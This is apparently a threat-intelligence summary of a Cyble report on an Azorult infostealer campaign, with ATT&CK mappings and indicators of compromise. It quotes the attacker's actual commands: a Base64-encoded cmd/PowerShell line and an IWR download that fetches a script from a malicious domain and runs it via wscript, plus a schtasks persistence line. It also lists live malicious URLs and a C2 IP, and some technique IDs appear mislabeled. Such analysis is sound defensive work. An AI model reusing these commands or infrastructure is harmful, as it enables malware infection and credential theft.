Threat Research

Sneaky Azorult Back In Action And Goes Undetected – Cyble

Securonix

Azorult malware makes a stealthy return with a multistage, memory-resident infection chain that starts from a ZIP containing a malicious LNK file masquerading as a PDF. The campaign uses obfuscated PowerShell, a batch dropper launched via Task Scheduler, and a loader fetched from a remote server to execute Azorult entirely in memory, avoiding disk traces. hashtags: #Azorult #PowerShell #LNK #InMemoryExecution #Loader #Cyble

Keypoints

  • Azorult re-emerges as an information-stealer with memory-only execution to evade disk-based detection.
  • Infection chain begins with a ZIP containing a malicious shortcut (lnk) disguised as a PDF.
  • Shortcut executes an obfuscated PowerShell script and drops a batch file via the Task Scheduler to run commands.
  • A loader is downloaded from a remote server, shellcode is injected, and the loader is executed in memory.
  • A second PowerShell script triggers the final Azorult payload, with all stages kept in memory.
  • The campaign leverages mutexes, anti-VM checks, registry queries (MachineGuid), and COM/CLR-based loading to hinder analysis.

MITRE Techniques

  • [T1059.003] Windows Command Shell – The infection chain uses cmd.exe to execute commands from the shortcut file. Quote: “C:WindowsSystem32cmd.exe” /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcgLU91dEZpbGUgJyV0ZW1wJVxmcW5JT1FkUi5qcyc7IHNjaHRhc2tzIC9kZWxldGUgL2YgL3RuIG41ZE1tSkVCWWM7IHdzY3JpcHQgJXRlbXAlXGZxbklPUWRSLmpzIg==” /gt; KgZvPA3S.bat / & certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat & schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr “C:UsersMALWOR~1AppDataLocalTempKgZvPA3S.bat”
  • [T1059.001] PowerShell – The batch file decodes a Base64 payload and triggers subsequent PowerShell-based stages. Quote: “start /min powershell -command “IWR ‘hxx://nrgtik.mx/wp-content/uploads/wp-content.php’ -OutFile ‘%temp%fqnIOQdR.js’; schtasks /delete /tn n5dMmJEBYc; wscript %temp%fqnIOQdR.js”
  • [T1027.001] Obfuscated/Compressed Files and Information – Base64-encoded payloads decoded via certutil. Quote: “Base64 encoded string. The command then creates a schedule task … and executes newly dropped fqnIOQdR.js
  • [T1053.005] Scheduled Task – Task Scheduler is used to repeatedly run the batch script every minute. Quote: “schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr …”
  • [T1105] Ingress Tool Transfer – Loader is downloaded from a remote server. Quote: “downloading an additional loader from a remote server, injecting shellcode, and executing the loader.”
  • [T1055] Process Injection – Shellcode is injected and the loader is executed in a newly created thread. Quote: “injects a hardcoded shellcode which subsequently executes the loader.”
  • [T1105.001] Windows Script Host (WSH): wscript – The loader executes the downloaded JavaScript/JS file via WScript. Quote: “wscript %temp%fqnIOQdR.js”
  • [T1113] Screen Capture – Azorult captures screenshots as part of data collection. Quote: “The malware specifically targets Mozilla Firefox, Google Chrome, Microsoft Edge, Brave, and Opera. The figure below shows the routine to capture screenshot.”
  • [T1082] System Information Discovery – The systeminfo() method gathers host details. Quote: “systeminfo() method … collects system details”
  • [T1555.003] Credentials from Web Browsers – The malware targets browser-stored credentials. Quote: “The table below lists the wallets targeted by the binary” and “Credentials from web browsers”
  • [T1083] File and Directory Discovery – The malware discovers application files/directories. Quote: “File and Directory Discovery (T1083) … Azroult can discover Application files and directories”
  • [T1059.005] Windows Script: PowerShell-based loader – PowerShell-based loading components via agent1.ps1 and agent3.ps1. Quote: “The second PowerShell script, ‘agent3.ps1’, functions as a loader.”
  • [TA0000] Exfiltration Over C2 Channel – Data is compressed/encrypted and sent to C2. Quote: “The data is compressed and encrypted before sending it to the server.”
  • [TA0011] Command and Control – Non-Application Layer Protocol (T1095) – The loader communicates with C2 and uses TCP for C2. Quote: “Non-Application Layer Protocol (T1095) … TCP for C&C communication”

Indicators of Compromise

  • [FileName] citibank_statement_dec_2023.zip – a647fd01215b0a86246007f36b7832f6
  • [Hash] citibank_statement_dec_2023.zip – b2bc65b0c792fc4ef32fc7c1d399f9f47ef15bd1
  • [Hash] citibank_statement_dec_2023.zip – 778b230b696e5ddb3a1063c939a60449f24d6f5bac91ac76e2c1e4dc24a20836
  • [FileName] citibank_statement_Dec_2023.lnk – 84d45c0ce97155ca8eb16980dca11215
  • [Hash] citibank_statement_Dec_2023.lnk – 897309fbe2028ebb2ac40cdf83fefc72dafe8632
  • [Hash] citibank_statement_Dec_2023.lnk – 37a76a6009092eebcfe08efe479cdde6f8d0cf6fd9ea2ce023e0c6a43d56693a
  • [FileName] fqnIOQdR.js – 9e3d15ed4044692d6f759f188f347355
  • [Hash] fqnIOQdR.js – 126c54696ecf7d36131a54006b3a2e524073189f
  • [Hash] fqnIOQdR.js – fc1ff043b6ab1e1a22baa93abbfa2fefcbb796f4de67224f589dc6dcd45c02f1
  • [FileName] KgZvPA3S.bat – c798c2fa8da58fc07210969ea5136977
  • [Hash] KgZvPA3S.bat – e11ff82d2e3db02ab4a450dcafbb38fd184c977f
  • [Hash] KgZvPA3S.bat – fd2b8640d3d05d80e769529883196fee8cc2c68d80416b7ee7b037cde5c3a877
  • [FileName] agent.js – dff2440766c462e3a2bb2b198085d171
  • [Hash] agent.js – 7b6c7b2c1ead869a658c3230356beec3c95062bd
  • [Hash] agent.js – ce7bd981cb416e2df589541ddbc0a3e6f3be5201a33f77e065cc79484b096a33
  • [FileName] agent1.ps1 – f05df7c16d8c236fab6ee2b2a1997ce5
  • [Hash] agent1.ps1 – c907067a207eb47eca8bdca81c18caddee133ff5
  • [Hash] agent1.ps1 – ace2a7812874a84b32590f440f9c4d9d99567e12cb86f0ba598e5e65aa4948c0
  • [FileName] agent3.ps1 – 274945641a4f798a13bddec960a82670
  • [Hash] agent3.ps1 – d61ef316cc5b8ec477fcfd8a2a677f53b79c6e0f
  • [Hash] agent3.ps1 – 30ab6f1db490a46fb8f1643ca97194988676498baf1ae4e124352f6cc1108568
  • [FileName] helper.exe – bc0523db21c69a68ba3e7bfc4711f969
  • [Hash] helper.exe – 8308433cb92810bcd6f220e7b6083c778e00fe12
  • [Hash] helper.exe – fd64e712eac0c7d5fdec9a1f47c1f384a67a181c13e3e98ff40ee122e9ff8347
  • [FileName] sd2.ps1 – b4127347d3d08d1a466289b2071e81e7
  • [Hash] sd2.ps1 – 49c7bf64cf331e5269a5fce351188b9ce6167571
  • [Hash] sd2.ps1 – 464a917b631b2a583025bdce274ba6f314fe30822cfa400301b924daf38e8a8c
  • [FileName] sd4.ps1 – 16eedcc3da8cc730941c9a2f4adaaf7a
  • [Hash] sd4.ps1 – c62df841320132fc0196101305ad6337c4d0e31e
  • [Hash] sd4.ps1 – 518d8bc5fa3f5ef09792aca8c78bed5c762e8a4e6a45f44cae974264cb5d0652
  • [Domain] nrgtik[.]mx – Malicious Domain
  • [Domain] nrgtik.mx – Malicious Domain
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php – Malicious URL
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1 – Malicious URL
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1 – Malicious URL
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/helper.exe – Malicious URL
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/sd2.ps1 – Malicious URL
  • [URL] hxxps://nrgtik[.]mx/wp-content/uploads/sd4.ps1 – Malicious URL
  • [IP] 45.90.58[.]1 – C2 IP address
  • [URL] http://45.90.58[.]1/index.php?id=$guid&subid=c4gQX595 – C2 URL

Read more: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/